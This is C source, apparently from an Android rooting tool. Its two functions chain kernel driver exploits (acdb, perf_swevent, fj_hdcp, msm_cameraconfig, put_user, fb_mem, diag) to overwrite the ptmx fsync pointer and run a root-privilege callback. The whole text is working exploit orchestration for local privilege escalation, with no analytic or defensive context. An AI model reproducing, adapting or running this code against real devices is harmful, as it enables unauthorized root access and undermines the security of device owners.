static bool run_exploit(void) { unsigned long int ptmx_fsync_address; unsigned long int ptmx_fops_address; ptmx_fops_address = get_ptmx_fops_address(); if (!ptmx_fops_address) { return false; } ptmx_fsync_address = ptmx_fops_address + 0x38; printf("Attempt acdb exploit...\n"); if (attempt_acdb_exploit(ptmx_fsync_address, 0)) { return true; } printf("\n"); printf("Attempt perf_swevent exploit...\n"); if (perf_swevent_run_exploit(ptmx_fsync_address, (int)&obtain_root_privilege, run_obtain_root_privilege, NULL)) { return true; } printf("\n"); printf("Attempt fj_hdcp exploit...\n"); if (attempt_fj_hdcp_exploit(ptmx_fsync_address, 0)) { return true; } printf("\n"); return attempt_diag_exploit(ptmx_fsync_address); }
bool attempt_exploit(unsigned long int address, unsigned long int write_value, unsigned long int restore_value, exploit_callback_t callback_func, void *callback_param) { callback_info_t info; info.func = callback_func; info.param = callback_param; info.result = false; // Attempt exploits in most stable order printf("Attempt acdb exploit...\n"); if (attempt_acdb_exploit(address, write_value, restore_value, &info)) { return info.result; } printf("\n"); printf("Attempt fj_hdcp exploit...\n"); if (attempt_fj_hdcp_exploit(address, write_value, restore_value, &info)) { return info.result; } printf("\n"); printf("Attempt msm_cameraconfig exploit...\n"); if (attempt_msm_cameraconfig_exploit(address, write_value, restore_value, &info)) { return info.result; } printf("\n"); printf("Attempt put_user exploit...\n"); if (attempt_put_user_exploit(address, write_value, restore_value, &info)) { return info.result; } printf("\n"); printf("Attempt fb_mem exploit...\n"); if (attempt_fb_mem_exploit(address, write_value, restore_value, &info)) { return info.result; } printf("\n"); printf("Attempt perf_swevent exploit...\n"); if (perf_swevent_run_exploit(address, write_value, &run_callback, &info)) { return info.result; } printf("\n"); if (attempt_diag_exploit(address, write_value, &info)) { return info.result; } return false; }